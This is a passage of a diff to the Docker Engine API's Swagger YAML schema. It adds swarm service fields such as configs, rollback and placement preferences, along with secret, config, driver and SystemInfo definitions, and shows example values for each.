+                    SecretName is the name of the secret that this references, but this is just provided for
+                    lookup/display purposes. The secret in the reference will be identified by its ID.
+                  type: "string"
+          Configs:
+            description: "Configs contains references to zero or more configs that will be exposed to the service."
+            type: "array"
+            items:
+              type: "object"
+              properties:
+                File:
+                  description: "File represents a specific target that is backed by a file."
+                  type: "object"
+                  properties:
+                    Name:
+                      description: "Name represents the final filename in the filesystem."
+                      type: "string"
+                    UID:
+                      description: "UID represents the file UID."
+                      type: "string"
+                    GID:
+                      description: "GID represents the file GID."
+                      type: "string"
+                    Mode:
+                      description: "Mode represents the FileMode of the file."
+                      type: "integer"
+                      format: "uint32"
+                ConfigID:
+                  description: "ConfigID represents the ID of the specific config that we're referencing."
+                  type: "string"
+                ConfigName:
+                  description: |
+                    ConfigName is the name of the config that this references, but this is just provided for
+                    lookup/display purposes. The config in the reference will be identified by its ID.
+                  type: "string"
+          Isolation:
+            type: "string"
+            description: "Isolation technology of the containers running the service. (Windows only)"
+            enum:
+              - "default"
+              - "process"
+              - "hyperv"
+          Init:
+            description: "Run an init inside the container that forwards signals and reaps processes. This field is omitted if empty, and the default (as configured on the daemon) is used."
+            type: "boolean"
+            x-nullable: true
+      NetworkAttachmentSpec:
+        description: |
+          Read-only spec type for non-swarm containers attached to swarm overlay
+          networks.
+
+          <p><br /></p>
+
+          > **Note**: ContainerSpec, NetworkAttachmentSpec, and PluginSpec are
+          > mutually exclusive. PluginSpec is only used when the Runtime field
+          > is set to `plugin`. NetworkAttachmentSpec is used when the Runtime
+          > field is set to `attachment`.
+        type: "object"
+        properties:
+          ContainerID:
+            description: "ID of the container represented by this task"
+            type: "string"
       Resources:
         description: "Resource requirements which apply to each individual container created as part of the service."
         type: "object"
         properties:
           Limits:
             description: "Define resources limits."
-            type: "object"
-            properties:
-              NanoCPUs:
-                description: "CPU limit in units of 10<sup>-9</sup> CPU shares."
-                type: "integer"
-                format: "int64"
-              MemoryBytes:
-                description: "Memory limit in Bytes."
-                type: "integer"
-                format: "int64"
+            $ref: "#/definitions/ResourceObject"
           Reservation:
             description: "Define resources reservation."
-            properties:
-              NanoCPUs:
-                description: "CPU reservation in units of 10<sup>-9</sup> CPU shares."
-                type: "integer"
-                format: "int64"
-              MemoryBytes:
-                description: "Memory reservation in Bytes."
-                type: "integer"
-                format: "int64"
+            $ref: "#/definitions/ResourceObject"
       RestartPolicy:
         description: "Specification for the restart policy which applies to containers created as part of this service."
         type: "object"
@@ -1944,9 +2784,42 @@ definitions:
             type: "array"
             items:
               type: "string"
+            example:
+              - "node.hostname!=node3.corp.example.com"
+              - "node.role!=manager"
+              - "node.labels.type==production"
+          Preferences:
+            description: "Preferences provide a way to make the scheduler aware of factors such as topology. They are provided in order from highest to lowest precedence."
+            type: "array"
+            items:
+              type: "object"
+              properties:
+                Spread:
+                  type: "object"
+                  properties:
+                    SpreadDescriptor:
+                      description: "label descriptor, such as engine.labels.az"
+                      type: "string"
+            example:
+              - Spread:
+                  SpreadDescriptor: "node.labels.datacenter"
+              - Spread:
+                  SpreadDescriptor: "node.labels.rack"
+          Platforms:
+            description: |
+              Platforms stores all the platforms that the service's image can
+              run on. This field is used in the platform filter for scheduling.
+              If empty, then the platform filter is off, meaning there are no
+              scheduling restrictions.
+            type: "array"
+            items:
+              $ref: "#/definitions/Platform"
       ForceUpdate:
         description: "A counter that triggers an update even if no relevant parameters have been changed."
         type: "integer"
+      Runtime:
+        description: "Runtime is the type of runtime specified for the task executor."
+        type: "string"
       Networks:
         type: "array"
         items:
@@ -1968,6 +2841,7 @@ definitions:
             type: "object"
             additionalProperties:
               type: "string"
+
   TaskState:
     type: "string"
     enum:
@@ -1984,6 +2858,9 @@ definitions:
       - "shutdown"
       - "failed"
       - "rejected"
+      - "remove"
+      - "orphaned"
+
   Task:
     type: "object"
     properties:
@@ -1991,11 +2868,7 @@ definitions:
         description: "The ID of the task."
         type: "string"
       Version:
-        type: "object"
-        properties:
-          Index:
-            type: "integer"
-            format: "int64"
+        $ref: "#/definitions/ObjectVersion"
       CreatedAt:
         type: "string"
         format: "dateTime"
@@ -2020,6 +2893,8 @@ definitions:
       NodeID:
         description: "The ID of the node that this task is on."
         type: "string"
+      AssignedGenericResources:
+        $ref: "#/definitions/GenericResources"
       Status:
         type: "object"
         properties:
@@ -2099,6 +2974,17 @@ definitions:
                   Gateway: "10.255.0.1"
           Addresses:
             - "10.255.0.10/16"
+      AssignedGenericResources:
+        - DiscreteResourceSpec:
+            Kind: "SSD"
+            Value: 3
+        - NamedResourceSpec:
+            Kind: "GPU"
+            Value: "UUID1"
+        - NamedResourceSpec:
+            Kind: "GPU"
+            Value: "UUID2"
+
   ServiceSpec:
     description: "User modifiable configuration for a service."
     properties:
@@ -2142,6 +3028,7 @@ definitions:
             enum:
               - "continue"
               - "pause"
+              - "rollback"
           Monitor:
             description: "Amount of time to monitor each updated task for failures, in nanoseconds."
             type: "integer"
@@ -2150,6 +3037,44 @@ definitions:
             description: "The fraction of tasks that may fail during an update before the failure action is invoked, specified as a floating point number between 0 and 1."
             type: "number"
             default: 0
+          Order:
+            description: "The order of operations when rolling out an updated task. Either the old task is shut down before the new task is started, or the new task is started before the old task is shut down."
+            type: "string"
+            enum:
+              - "stop-first"
+              - "start-first"
+      RollbackConfig:
+        description: "Specification for the rollback strategy of the service."
+        type: "object"
+        properties:
+          Parallelism:
+            description: "Maximum number of tasks to be rolled back in one iteration (0 means unlimited parallelism)."
+            type: "integer"
+            format: "int64"
+          Delay:
+            description: "Amount of time between rollback iterations, in nanoseconds."
+            type: "integer"
+            format: "int64"
+          FailureAction:
+            description: "Action to take if an rolled back task fails to run, or stops running during the rollback."
+            type: "string"
+            enum:
+              - "continue"
+              - "pause"
+          Monitor:
+            description: "Amount of time to monitor each rolled back task for failures, in nanoseconds."
+            type: "integer"
+            format: "int64"
+          MaxFailureRatio:
+            description: "The fraction of tasks that may fail during a rollback before the failure action is invoked, specified as a floating point number between 0 and 1."
+            type: "number"
+            default: 0
+          Order:
+            description: "The order of operations when rolling back a task. Either the old task is shut down before the new task is started, or the new task is started before the old task is shut down."
+            type: "string"
+            enum:
+              - "stop-first"
+              - "start-first"
       Networks:
         description: "Array of network names or IDs to attach the service to."
         type: "array"
@@ -2164,6 +3089,7 @@ definitions:
                 type: "string"
       EndpointSpec:
         $ref: "#/definitions/EndpointSpec"
+
   EndpointPortConfig:
     type: "object"
     properties:
@@ -2174,12 +3100,32 @@ definitions:
         enum:
           - "tcp"
           - "udp"
+          - "sctp"
       TargetPort:
         description: "The port inside the container."
         type: "integer"
       PublishedPort:
         description: "The port on the swarm hosts."
         type: "integer"
+      PublishMode:
+        description: |
+          The mode in which port is published.
+
+          <p><br /></p>
+
+          - "ingress" makes the target port accessible on on every node,
+            regardless of whether there is a task for the service running on
+            that node or not.
+          - "host" bypasses the routing mesh and publish the port directly on
+            the swarm node where that service is running.
+
+        type: "string"
+        enum:
+          - "ingress"
+          - "host"
+        default: "ingress"
+        example: "ingress"
+
   EndpointSpec:
     description: "Properties that can be configured to access and load balance a service."
     type: "object"
@@ -2197,17 +3143,14 @@ definitions:
         type: "array"
         items:
           $ref: "#/definitions/EndpointPortConfig"
+
   Service:
     type: "object"
     properties:
       ID:
         type: "string"
       Version:
-        type: "object"
-        properties:
-          Index:
-            type: "integer"
-            format: "int64"
+        $ref: "#/definitions/ObjectVersion"
       CreatedAt:
         type: "string"
         format: "dateTime"
@@ -2276,6 +3219,13 @@ definitions:
             Replicas: 1
         UpdateConfig:
           Parallelism: 1
+          Delay: 1000000000
+          FailureAction: "pause"
+          Monitor: 15000000000
+          MaxFailureRatio: 0.15
+        RollbackConfig:
+          Parallelism: 1
+          Delay: 1000000000
           FailureAction: "pause"
           Monitor: 15000000000
           MaxFailureRatio: 0.15
@@ -2306,7 +3256,8 @@ definitions:
           -
             NetworkID: "4qvuz4ko70xaltuqbt8956gd1"
             Addr: "10.255.0.3/16"
-  ImageDeleteResponse:
+
+  ImageDeleteResponseItem:
     type: "object"
     properties:
       Untagged:
@@ -2315,6 +3266,7 @@ definitions:
       Deleted:
         description: "The image ID of an image that was deleted"
         type: "string"
+
   ServiceUpdateResponse:
     type: "object"
     properties:
@@ -2325,6 +3277,7 @@ definitions:
           type: "string"
     example:
       Warning: "unable to pin image doesnotexist:latest to digest: image library/doesnotexist:latest not found"
+
   ContainerSummary:
     type: "array"
     items:
@@ -2393,6 +3346,27 @@ definitions:
           type: "array"
           items:
             $ref: "#/definitions/Mount"
+
+  Driver:
+    description: "Driver represents a driver (network, logging, secrets)."
+    type: "object"
+    required: [Name]
+    properties:
+      Name:
+        description: "Name of the driver."
+        type: "string"
+        x-nullable: false
+        example: "some-driver"
+      Options:
+        description: "Key/value map of driver-specific options."
+        type: "object"
+        x-nullable: false
+        additionalProperties:
+          type: "string"
+        example:
+          OptionA: "value for driver-specific option A"
+          OptionB: "value for driver-specific option B"
+
   SecretSpec:
     type: "object"
     properties:
@@ -2404,182 +3378,1014 @@ definitions:
         type: "object"
         additionalProperties:
           type: "string"
+        example:
+          com.example.some-label: "some-value"
+          com.example.some-other-label: "some-other-value"
       Data:
-        description: "Base64-url-safe-encoded secret data"
-        type: "array"
-        items:
-          type: "string"
+        description: |
+          Base64-url-safe-encoded ([RFC 4648](https://tools.ietf.org/html/rfc4648#section-3.2))
+          data to store as secret.
+
+          This field is only used to _create_ a secret, and is not returned by
+          other endpoints.
+        type: "string"
+        example: ""
+      Driver:
+        description: "Name of the secrets driver used to fetch the secret's value from an external secret store"
+        $ref: "#/definitions/Driver"
+      Templating:
+        description: |
+          Templating driver, if applicable
+
+          Templating controls whether and how to evaluate the config payload as
+          a template. If no driver is set, no templating is used.
+        $ref: "#/definitions/Driver"
+
   Secret:
     type: "object"
     properties:
       ID:
         type: "string"
+        example: "blt1owaxmitz71s9v5zh81zun"
       Version:
-        type: "object"
-        properties:
-          Index:
-            type: "integer"
-            format: "int64"
+        $ref: "#/definitions/ObjectVersion"
       CreatedAt:
         type: "string"
         format: "dateTime"
+        example: "2017-07-20T13:55:28.678958722Z"
       UpdatedAt:
         type: "string"
         format: "dateTime"
+        example: "2017-07-20T13:55:28.678958722Z"
       Spec:
-        $ref: "#/definitions/ServiceSpec"
-paths:
-  /containers/json:
-    get:
-      summary: "List containers"
-      operationId: "ContainerList"
-      produces:
-        - "application/json"
-      parameters:
-        - name: "all"
-          in: "query"
-          description: "Return all containers. By default, only running containers are shown"
-          type: "boolean"
-          default: false
-        - name: "limit"
-          in: "query"
-          description: "Return this number of most recently created containers, including non-running ones."
-          type: "integer"
-        - name: "size"
-          in: "query"
-          description: "Return the size of container as fields `SizeRw` and `SizeRootFs`."
-          type: "boolean"
-          default: false
-        - name: "filters"
-          in: "query"
-          description: |
-            Filters to process on the container list, encoded as JSON (a `map[string][]string`). For example, `{"status": ["paused"]}` will only return paused containers.
+        $ref: "#/definitions/SecretSpec"
 
-            Available filters:
-            - `exited=<int>` containers with exit code of `<int>`
-            - `status=`(`created`|`restarting`|`running`|`removing`|`paused`|`exited`|`dead`)
-            - `label=key` or `label="key=value"` of a container label
-            - `isolation=`(`default`|`process`|`hyperv`) (Windows daemon only)
-            - `id=<ID>` a container's ID
-            - `name=<name>` a container's name
-            - `is-task=`(`true`|`false`)
-            - `ancestor`=(`<image-name>[:<tag>]`, `<image id>`, or `<image@digest>`)
-            - `before`=(`<container id>` or `<container name>`)
-            - `since`=(`<container id>` or `<container name>`)
-            - `volume`=(`<volume name>` or `<mount point destination>`)
-            - `network`=(`<network id>` or `<network name>`)
-            - `health`=(`starting`|`healthy`|`unhealthy`|`none`)
+  ConfigSpec:
+    type: "object"
+    properties:
+      Name:
+        description: "User-defined name of the config."
+        type: "string"
+      Labels:
+        description: "User-defined key/value metadata."
+        type: "object"
+        additionalProperties:
           type: "string"
-      responses:
-        200:
-          description: "no error"
-          schema:
-            $ref: "#/definitions/ContainerSummary"
-          examples:
-            application/json:
-              - Id: "8dfafdbc3a40"
-                Names:
-                  - "/boring_feynman"
-                Image: "ubuntu:latest"
-                ImageID: "d74508fb6632491cea586a1fd7d748dfc5274cd6fdfedee309ecdcbc2bf5cb82"
-                Command: "echo 1"
-                Created: 1367854155
-                State: "Exited"
-                Status: "Exit 0"
-                Ports:
-                  - PrivatePort: 2222
-                    PublicPort: 3333
-                    Type: "tcp"
-                Labels:
-                  com.example.vendor: "Acme"
-                  com.example.license: "GPL"
-                  com.example.version: "1.0"
-                SizeRw: 12288
-                SizeRootFs: 0
-                HostConfig:
-                  NetworkMode: "default"
-                NetworkSettings:
-                  Networks:
-                    bridge:
-                      NetworkID: "7ea29fc1412292a2d7bba362f9253545fecdfa8ce9a6e37dd10ba8bee7129812"
-                      EndpointID: "2cdc4edb1ded3631c81f57966563e5c8525b81121bb3706a9a9a3ae102711f3f"
-                      Gateway: "172.17.0.1"
-                      IPAddress: "172.17.0.2"
-                      IPPrefixLen: 16
-                      IPv6Gateway: ""
-                      GlobalIPv6Address: ""
-                      GlobalIPv6PrefixLen: 0
-                      MacAddress: "02:42:ac:11:00:02"
-                Mounts:
-                  - Name: "fac362...80535"
-                    Source: "/data"
-                    Destination: "/data"
-                    Driver: "local"
-                    Mode: "ro,Z"
-                    RW: false
-                    Propagation: ""
-              - Id: "9cd87474be90"
-                Names:
-                  - "/coolName"
-                Image: "ubuntu:latest"
-                ImageID: "d74508fb6632491cea586a1fd7d748dfc5274cd6fdfedee309ecdcbc2bf5cb82"
-                Command: "echo 222222"
-                Created: 1367854155
-                State: "Exited"
-                Status: "Exit 0"
-                Ports: []
-                Labels: {}
-                SizeRw: 12288
-                SizeRootFs: 0
-                HostConfig:
-                  NetworkMode: "default"
-                NetworkSettings:
-                  Networks:
-                    bridge:
-                      NetworkID: "7ea29fc1412292a2d7bba362f9253545fecdfa8ce9a6e37dd10ba8bee7129812"
-                      EndpointID: "88eaed7b37b38c2a3f0c4bc796494fdf51b270c2d22656412a2ca5d559a64d7a"
-                      Gateway: "172.17.0.1"
-                      IPAddress: "172.17.0.8"
-                      IPPrefixLen: 16
-                      IPv6Gateway: ""
-                      GlobalIPv6Address: ""
-                      GlobalIPv6PrefixLen: 0
-                      MacAddress: "02:42:ac:11:00:08"
-                Mounts: []
-              - Id: "3176a2479c92"
-                Names:
-                  - "/sleepy_dog"
-                Image: "ubuntu:latest"
-                ImageID: "d74508fb6632491cea586a1fd7d748dfc5274cd6fdfedee309ecdcbc2bf5cb82"
-                Command: "echo 3333333333333333"
-                Created: 1367854154
-                State: "Exited"
-                Status: "Exit 0"
-                Ports: []
-                Labels: {}
-                SizeRw: 12288
-                SizeRootFs: 0
-                HostConfig:
-                  NetworkMode: "default"
-                NetworkSettings:
-                  Networks:
-                    bridge:
-                      NetworkID: "7ea29fc1412292a2d7bba362f9253545fecdfa8ce9a6e37dd10ba8bee7129812"
-                      EndpointID: "8b27c041c30326d59cd6e6f510d4f8d1d570a228466f956edf7815508f78e30d"
-                      Gateway: "172.17.0.1"
-                      IPAddress: "172.17.0.6"
-                      IPPrefixLen: 16
-                      IPv6Gateway: ""
-                      GlobalIPv6Address: ""
-                      GlobalIPv6PrefixLen: 0
-                      MacAddress: "02:42:ac:11:00:06"
-                Mounts: []
-              - Id: "4cb07b47f9fb"
-                Names:
-                  - "/running_cat"
-                Image: "ubuntu:latest"
-                ImageID: "d74508fb6632491cea586a1fd7d748dfc5274cd6fdfedee309ecdcbc2bf5cb82"
-                Command: "echo 444444444444444444444444444444444"
+      Data:
+        description: |
+          Base64-url-safe-encoded ([RFC 4648](https://tools.ietf.org/html/rfc4648#section-3.2))
+          config data.
+        type: "string"
+      Templating:
+        description: |
+          Templating driver, if applicable
+
+          Templating controls whether and how to evaluate the config payload as
+          a template. If no driver is set, no templating is used.
+        $ref: "#/definitions/Driver"
+
+  Config:
+    type: "object"
+    properties:
+      ID:
+        type: "string"
+      Version:
+        $ref: "#/definitions/ObjectVersion"
+      CreatedAt:
+        type: "string"
+        format: "dateTime"
+      UpdatedAt:
+        type: "string"
+        format: "dateTime"
+      Spec:
+        $ref: "#/definitions/ConfigSpec"
+
+  SystemInfo:
+    type: "object"
+    properties:
+      ID:
+        description: |
+          Unique identifier of the daemon.
+
+          <p><br /></p>
+
+          > **Note**: The format of the ID itself is not part of the API, and
+          > should not be considered stable.
+        type: "string"
+        example: "7TRN:IPZB:QYBB:VPBQ:UMPP:KARE:6ZNR:XE6T:7EWV:PKF4:ZOJD:TPYS"
+      Containers:
+        description: "Total number of containers on the host."
+        type: "integer"
+        example: 14
+      ContainersRunning:
+        description: |
+          Number of containers with status `"running"`.
+        type: "integer"
+        example: 3
+      ContainersPaused:
+        description: |
+          Number of containers with status `"paused"`.
+        type: "integer"
+        example: 1
+      ContainersStopped:
+        description: |
+          Number of containers with status `"stopped"`.
+        type: "integer"
+        example: 10
+      Images:
+        description: |
+          Total number of images on the host.
+
+          Both _tagged_ and _untagged_ (dangling) images are counted.
+        type: "integer"
+        example: 508
+      Driver:
+        description: "Name of the storage driver in use."
+        type: "string"
+        example: "overlay2"
+      DriverStatus:
+        description: |
+          Information specific to the storage driver, provided as
+          "label" / "value" pairs.
+
+          This information is provided by the storage driver, and formatted
+          in a way consistent with the output of `docker info` on the command
+          line.
+
+          <p><br /></p>
+
+          > **Note**: The information returned in this field, including the
+          > formatting of values and labels, should not be considered stable,
+          > and may change without notice.
+        type: "array"
+        items:
+          type: "array"
+          items:
+            type: "string"
+        example:
+          - ["Backing Filesystem", "extfs"]
+          - ["Supports d_type", "true"]
+          - ["Native Overlay Diff", "true"]
+      DockerRootDir:
+        description: |
+          Root directory of persistent Docker state.
+
+          Defaults to `/var/lib/docker` on Linux, and `C:\ProgramData\docker`
+          on Windows.
+        type: "string"
+        example: "/var/lib/docker"
+      SystemStatus:
+        description: |
+          Status information about this node (standalone Swarm API).
+
+          <p><br /></p>
+
+          > **Note**: The information returned in this field is only propagated
+          > by the Swarm standalone API, and is empty (`null`) when using
+          > built-in swarm mode.
+        type: "array"
+        items:
+          type: "array"
+          items:
+            type: "string"
+        example:
+          - ["Role", "primary"]
+          - ["State", "Healthy"]
+          - ["Strategy", "spread"]
+          - ["Filters", "health, port, containerslots, dependency, affinity, constraint, whitelist"]
+          - ["Nodes", "2"]
+          - [" swarm-agent-00", "192.168.99.102:2376"]
+          - ["  └ ID", "5CT6:FBGO:RVGO:CZL4:PB2K:WCYN:2JSV:KSHH:GGFW:QOPG:6J5Q:IOZ2|192.168.99.102:2376"]
+          - ["  └ Status", "Healthy"]
+          - ["  └ Containers", "1 (1 Running, 0 Paused, 0 Stopped)"]
+          - ["  └ Reserved CPUs", "0 / 1"]
+          - ["  └ Reserved Memory", "0 B / 1.021 GiB"]
+          - ["  └ Labels", "kernelversion=4.4.74-boot2docker, operatingsystem=Boot2Docker 17.06.0-ce (TCL 7.2); HEAD : 0672754 - Thu Jun 29 00:06:31 UTC 2017, ostype=linux, provider=virtualbox, storagedriver=aufs"]
+          - ["  └ UpdatedAt", "2017-08-09T10:03:46Z"]
+          - ["  └ ServerVersion", "17.06.0-ce"]
+          - [" swarm-manager", "192.168.99.101:2376"]
+          - ["  └ ID", "TAMD:7LL3:SEF7:LW2W:4Q2X:WVFH:RTXX:JSYS:XY2P:JEHL:ZMJK:JGIW|192.168.99.101:2376"]
+          - ["  └ Status", "Healthy"]
+          - ["  └ Containers", "2 (2 Running, 0 Paused, 0 Stopped)"]
+          - ["  └ Reserved CPUs", "0 / 1"]
+          - ["  └ Reserved Memory", "0 B / 1.021 GiB"]
+          - ["  └ Labels", "kernelversion=4.4.74-boot2docker, operatingsystem=Boot2Docker 17.06.0-ce (TCL 7.2); HEAD : 0672754 - Thu Jun 29 00:06:31 UTC 2017, ostype=linux, provider=virtualbox, storagedriver=aufs"]
+          - ["  └ UpdatedAt", "2017-08-09T10:04:11Z"]
+          - ["  └ ServerVersion", "17.06.0-ce"]
+      Plugins:
+        $ref: "#/definitions/PluginsInfo"
+      MemoryLimit:
+        description: "Indicates if the host has memory limit support enabled."
+        type: "boolean"
+        example: true
+      SwapLimit:
+        description: "Indicates if the host has memory swap limit support enabled."
+        type: "boolean"
+        example: true
+      KernelMemory:
+        description: "Indicates if the host has kernel memory limit support enabled."
+        type: "boolean"
+        example: true
+      CpuCfsPeriod:
+        description: "Indicates if CPU CFS(Completely Fair Scheduler) period is supported by the host."
+        type: "boolean"
+        example: true
+      CpuCfsQuota:
+        description: "Indicates if CPU CFS(Completely Fair Scheduler) quota is supported by the host."
+        type: "boolean"
+        example: true
+      CPUShares:
+        description: "Indicates if CPU Shares limiting is supported by the host."
+        type: "boolean"
+        example: true
+      CPUSet:
+        description: |
+          Indicates if CPUsets (cpuset.cpus, cpuset.mems) are supported by the host.
+
+          See [cpuset(7)](https://www.kernel.org/doc/Documentation/cgroup-v1/cpusets.txt)
+        type: "boolean"
+        example: true
+      OomKillDisable:
+        description: "Indicates if OOM killer disable is supported on the host."
+        type: "boolean"
+      IPv4Forwarding:
+        description: "Indicates IPv4 forwarding is enabled."
+        type: "boolean"
+        example: true
+      BridgeNfIptables:
+        description: "Indicates if `bridge-nf-call-iptables` is available on the host."
+        type: "boolean"
+        example: true
+      BridgeNfIp6tables:
+        description: "Indicates if `bridge-nf-call-ip6tables` is available on the host."
+        type: "boolean"
+        example: true
+      Debug:
+        description: "Indicates if the daemon is running in debug-mode / with debug-level logging enabled."
+        type: "boolean"
+        example: true
+      NFd:
+        description: |
+          The total number of file Descriptors in use by the daemon process.
+
+          This information is only returned if debug-mode is enabled.
+        type: "integer"
+        example: 64
+      NGoroutines:
+        description: |
+          The  number of goroutines that currently exist.
+
+          This information is only returned if debug-mode is enabled.
+        type: "integer"
+        example: 174
+      SystemTime:
+        description: |
+          Current system-time in [RFC 3339](https://www.ietf.org/rfc/rfc3339.txt)
+          format with nano-seconds.
+        type: "string"
+        example: "2017-08-08T20:28:29.06202363Z"
+      LoggingDriver:
+        description: |
+          The logging driver to use as a default for new containers.
+        type: "string"
+      CgroupDriver:
+        description: |
+          The driver to use for managing cgroups.
+        type: "string"
+        enum: ["cgroupfs", "systemd"]
+        default: "cgroupfs"
+        example: "cgroupfs"
+      NEventsListener:
+        description: "Number of event listeners subscribed."
+        type: "integer"
+        example: 30
+      KernelVersion:
+        description: |
+          Kernel version of the host.
+
+          On Linux, this information obtained from `uname`. On Windows this
+          information is queried from the <kbd>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\</kbd>
+          registry value, for example _"10.0 14393 (14393.1198.amd64fre.rs1_release_sec.170427-1353)"_.
+        type: "string"
+        example: "4.9.38-moby"
+      OperatingSystem:
+        description: |
+          Name of the host's operating system, for example: "Ubuntu 16.04.2 LTS"
+          or "Windows Server 2016 Datacenter"
+        type: "string"
+        example: "Alpine Linux v3.5"
+      OSType:
+        description: |
+          Generic type of the operating system of the host, as returned by the
+          Go runtime (`GOOS`).
+
+          Currently returned values are "linux" and "windows". A full list of
+          possible values can be found in the [Go documentation](https://golang.org/doc/install/source#environment).
+        type: "string"
+        example: "linux"
+      Architecture:
+        description: |
+          Hardware architecture of the host, as returned by the Go runtime
+          (`GOARCH`).
+
+          A full list of possible values can be found in the [Go documentation](https://golang.org/doc/install/source#environment).
+        type: "string"
+        example: "x86_64"
+      NCPU:
+        description: |
+          The number of logical CPUs usable by the daemon.
+
+          The number of available CPUs is checked by querying the operating
+          system when the daemon starts. Changes to operating system CPU
+          allocation after the daemon is started are not reflected.
+        type: "integer"
+        example: 4
+      MemTotal:
+        description: |
+          Total amount of physical memory available on the host, in kilobytes (kB).
+        type: "integer"
+        format: "int64"
+        example: 2095882240
+
+      IndexServerAddress:
+        description: |
+          Address / URL of the index server that is used for image search,
+          and as a default for user authentication for Docker Hub and Docker Cloud.
+        default: "https://index.docker.io/v1/"
+        type: "string"
+        example: "https://index.docker.io/v1/"
+      RegistryConfig:
+        $ref: "#/definitions/RegistryServiceConfig"
+      GenericResources:
+        $ref: "#/definitions/GenericResources"
+      HttpProxy:
+        description: |
+          HTTP-proxy configured for the daemon. This value is obtained from the
+          [`HTTP_PROXY`](https://www.gnu.org/software/wget/manual/html_node/Proxies.html) environment variable.
+
+          Containers do not automatically inherit this configuration.
+        type: "string"
+        example: "http://user:pass@proxy.corp.example.com:8080"
+      HttpsProxy:
+        description: |
+          HTTPS-proxy configured for the daemon. This value is obtained from the
+          [`HTTPS_PROXY`](https://www.gnu.org/software/wget/manual/html_node/Proxies.html) environment variable.
+
+          Containers do not automatically inherit this configuration.
+        type: "string"
+        example: "https://user:pass@proxy.corp.example.com:4443"
+      NoProxy:
+        description: |
+          Comma-separated list of domain extensions for which no proxy should be
+          used. This value is obtained from the [`NO_PROXY`](https://www.gnu.org/software/wget/manual/html_node/Proxies.html)
+          environment variable.
+
+          Containers do not automatically inherit this configuration.
+        type: "string"
+        example: "*.local, 169.254/16"
+      Name:
+        description: "Hostname of the host."
+        type: "string"
+        example: "node5.corp.example.com"
+      Labels:
+        description: |
+          User-defined labels (key/value metadata) as set on the daemon.
+
+          <p><br /></p>
+
+          > **Note**: When part of a Swarm, nodes can both have _daemon_ labels,
+          > set through the daemon configuration, and _node_ labels, set from a
+          > manager node in the Swarm. Node labels are not included in this
+          > field. Node labels can be retrieved using the `/nodes/(id)` endpoint
+          > on a manager node in the Swarm.
+        type: "array"
+        items:
+          type: "string"
+        example: ["storage=ssd", "production"]
+      ExperimentalBuild:
+        description: |
+          Indicates if experimental features are enabled on the daemon.
+        type: "boolean"
+        example: true
+      ServerVersion:
+        description: |
+          Version string of the daemon.
+
+          > **Note**: the [standalone Swarm API](https://docs.docker.com/swarm/swarm-api/)
+          > returns the Swarm version instead of the daemon  version, for example
+          > `swarm/1.2.8`.
+        type: "string"
+        example: "17.06.0-ce"
+      ClusterStore:
+        description: |
+          URL of the distributed storage backend.
+
+
+          The storage backend is used for multihost networking (to store
+          network and endpoint information) and by the node discovery mechanism.
+
+          <p><br /></p>
+
+          > **Note**: This field is only propagated when using standalone Swarm
+          > mode, and overlay networking using an external k/v store. Overlay
+          > networks with Swarm mode enabled use the built-in raft store, and
+          > this field will be empty.
+        type: "string"
+        example: "consul://consul.corp.example.com:8600/some/path"
+      ClusterAdvertise:
+        description: |
+          The network endpoint that the Engine advertises for the purpose of
+          node discovery. ClusterAdvertise is a `host:port` combination on which
+          the daemon is reachable by other hosts.
+
+          <p><br /></p>
+
+          > **Note**: This field is only propagated when using standalone Swarm
+          > mode, and overlay networking using an external k/v store. Overlay
+          > networks with Swarm mode enabled use the built-in raft store, and
+          > this field will be empty.
+        type: "string"
+        example: "node5.corp.example.com:8000"
+      Runtimes:
+        description: |
+          List of [OCI compliant](https://github.com/opencontainers/runtime-spec)
+          runtimes configured on the daemon. Keys hold the "name" used to
+          reference the runtime.
+
+          The Docker daemon relies on an OCI compliant runtime (invoked via the
+          `containerd` daemon) as its interface to the Linux kernel namespaces,
+          cgroups, and SELinux.
+
+          The default runtime is `runc`, and automatically configured. Additional
+          runtimes can be configured by the user and will be listed here.
+        type: "object"
+        additionalProperties:
+          $ref: "#/definitions/Runtime"
+        default:
+          runc:
+            path: "docker-runc"
+        example:
+          runc:
+            path: "docker-runc"
+          runc-master:
+            path: "/go/bin/runc"
+          custom:
+            path: "/usr/local/bin/my-oci-runtime"
+            runtimeArgs: ["--debug", "--systemd-cgroup=false"]
+      DefaultRuntime:
+        description: |
+          Name of the default OCI runtime that is used when starting containers.
+
+          The default can be overridden per-container at create time.
+        type: "string"
+        default: "runc"
+        example: "runc"
+      Swarm:
+        $ref: "#/definitions/SwarmInfo"
+      LiveRestoreEnabled:
+        description: |
+          Indicates if live restore is enabled.
+
+          If enabled, containers are kept running when the daemon is shutdown
+          or upon daemon start if running containers are detected.
+        type: "boolean"
+        default: false
+        example: false
+      Isolation:
+        description: |
+          Represents the isolation technology to use as a default for containers.
+          The supported values are platform-specific.
+
+          If no isolation value is specified on daemon start, on Windows client,
+          the default is `hyperv`, and on Windows server, the default is `process`.
+
+          This option is currently not used on other platforms.
+        default: "default"
+        type: "string"
+        enum:
+          - "default"
+          - "hyperv"
+          - "process"
+      InitBinary:
+        description: |
+          Name and, optional, path of the `docker-init` binary.
+
+          If the path is omitted, the daemon searches the host's `$PATH` for the
+          binary and uses the first result.
+        type: "string"
+        example: "docker-init"
+      ContainerdCommit:
+        $ref: "#/definitions/Commit"
+      RuncCommit:
+        $ref: "#/definitions/Commit"
+      InitCommit:
+        $ref: "#/definitions/Commit"
+      SecurityOptions:
+        description: |
+          List of security features that are enabled on the daemon, such as
+          apparmor, seccomp, SELinux, and user-namespaces (userns).
+
+          Additional configuration options for each security feature may
+          be present, and are included as a comma-separated list of key/value
+          pairs.
+        type: "array"
+        items:
+          type: "string"
+        example:
+          - "name=apparmor"
+          - "name=seccomp,profile=default"
+          - "name=selinux"
+          - "name=userns"
+
+
+  # PluginsInfo is a temp struct holding Plugins name
+  # registered with docker daemon. It is used by Info struct
+  PluginsInfo:
+    description: |
+      Available plugins per type.
+
+      <p><br /></p>
+
+      > **Note**: Only unmanaged (V1) plugins are included in this list.
+      > V1 plugins are "lazily" loaded, and are not returned in this list
+      > if there is no resource using the plugin.
+    type: "object"
+    properties:
+      Volume:
+        description: "Names of available volume-drivers, and network-driver plugins."
+        type: "array"
+        items:
+          type: "string"
+        example: ["local"]
+      Network:
+        description: "Names of available network-drivers, and network-driver plugins."
+        type: "array"
+        items:
+          type: "string"
+        example: ["bridge", "host", "ipvlan", "macvlan", "null", "overlay"]
+      Authorization:
+        description: "Names of available authorization plugins."
+        type: "array"
+        items:
+          type: "string"
+        example: ["img-authz-plugin", "hbm"]
+      Log:
